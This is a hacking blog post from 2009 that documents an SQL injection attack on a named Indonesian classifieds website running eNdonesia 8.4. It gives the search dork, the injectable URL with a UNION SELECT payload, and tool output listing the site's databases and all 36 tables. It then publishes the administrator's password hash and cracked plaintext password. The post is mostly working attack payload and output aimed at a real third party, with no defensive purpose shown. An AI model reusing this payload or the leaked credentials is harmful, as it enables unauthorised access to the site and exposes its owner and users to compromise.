viperfx07 blog (hack + crack + web + app)

viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Tuesday, February 3, 2009

[SQLi] http://www.iklansolo.net

5:32 PM Posted by viperfx07 No comments


Tools: schemafuzz v5.0 mod by me
Dork : "Powered by eNdonesia 8.4"
This exploit can also be found on milworm.com, but there is a slight different.
Admin panel : http://www.iklansolo.net
Admin usr/pwd : admin : is12123

[+] URL:http://www.iklansolo.net/mod.php?mod=publisher&op=viewcat&cid=9+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 17:36:28
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: isnet_dbend83
User: isnet_siti@localhost
Version: 5.0.67-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 6

[0]isnet_cart
[1]isnet_dbend83
[2]isnet_host
[3]isnet_i1
[4]isnet_i2
[5]isnet_web

[+] URL:http://www.iklansolo.net/mod.php?mod=publisher&op=viewcat&cid=9+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 17:13:35
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: isnet_dbend83
User: isnet_siti@localhost
Version: 5.0.67-community
[+] Showing Tables & Columns from database "isnet_dbend83"
[+] Number of Tables: 36

[Database]: isnet_dbend83
[Table: Columns]
[0]authors: aid,name,url,email,pwd,counter
[1]banner: bid,cid,imptotal,impmade,clicks,imageurl,clickurl,date
[2]bannerclient: cid,name,contact,email,login,passwd,extrainfo
[3]bannerfinish: bid,cid,impressions,clicks,datestart,dateend
[4]counter: type,var,count
[5]lblocks: id,title,content,order_id
[6]main_page_content: main_title,main_text,main_image,main_image_active,alt,active
[7]mod_about: aboutid,parentid,jenis,menu,url,judul,info,foto,fotopos,status,orderid,postdate,lastupdate
[8]mod_content: contid,parentid,jenis,menu,url,judul,info,foto,fotopos,status,orderid,postdate,lastupdate
[9]mod_diskusi: did,cid,title,disktext,author,postdate,counter
[10]mod_diskusi_categories: cid,title,parentid
[11]mod_diskusi_response: rid,did,title,disktext,responder,postdate,counter
[12]mod_iklanbaris: lid,cid,title,description,url,postdate,expiredate,uname
[13]mod_iklanbaris_categories: cid,title,parentid
[14]mod_informasi: infoid,parentid,intypeid,jenis,menu,url,judul,info,foto,fotopos,status,orderid,feat,postdate,lastupdate
[15]mod_informasi_type: intypeid,infotype,status,orderid,postdate
[16]mod_katalog: lid,title,url,description,date,name,email,hits
[17]mod_katalog_categories: cid,title,parentid
[18]mod_katalog_katakate: kake,lid,cid
[19]mod_katalog_related: kare,cid,related
[20]mod_katalog_validate: lid,cid,title,url,description,name,email,date
[21]mod_newsletter: tipnl_id,tipnl_title,tipnl_description,tipnl_htmlemail,tipnl_plainemail,tipnl_status
[22]mod_newsletter_members: tipnm_id,tipnm_name,tipnm_email,tipnm_newsid,tipnm_mailpref
[23]mod_poll_comments: cid,rid,pid,date,name,email,url,host_name,subject,comment,score,reason
[24]mod_poll_data: pid,data
[25]mod_poll_flag: pid,flag
[26]mod_publisher: artid,aid,title,time,released,hometext,bodytext,counter,informant,media,extension
[27]mod_publisher_categories: cid,title,parentid,orderid
[28]mod_publisher_frontpage: fpid,position,category,flimit,orderid,media
[29]mod_publisher_media: mid,artid,extension,thumbnail_extension,title,description,short_description,width,height,filesize,time
[30]mod_publisher_submit: subid,cid,title,time,hometext,bodytext,informant
[31]mod_publisher_topik: ptid,artid,cid
[32]modules: id,name,source_file,img,plug_dir,block_pos,block_order,block_file,admin_only,user_only,admin_inc,about
[33]new_referer: ref_id,url,hit_total,time
[34]rblocks: id,title,content,order_id
[35]users: uid,name,uname,email,femail,url,pass,storynum,bio,ublockon,ublock,theme,counter,regdate,lastlogin

[-] [17:21:01]
[-] Total URL Requests 245
[-] Done


[+] URL:http://www.iklansolo.net/mod.php?mod=publisher&op=viewcat&cid=9+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 17:25:46
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: isnet_dbend83
User: isnet_siti@localhost
Version: 5.0.67-community
[+] Dumping data from database "isnet_dbend83" Table "authors"
[+] Column(s) ['name', 'pwd']
[+] Number of Rows: 1

[0] admin:df9dc8d9eac3e24570e9d39ac2a90988: = is12123

[-] [17:25:52]
[-] Total URL Requests 3
[-] Done

0 comments:

Post a Comment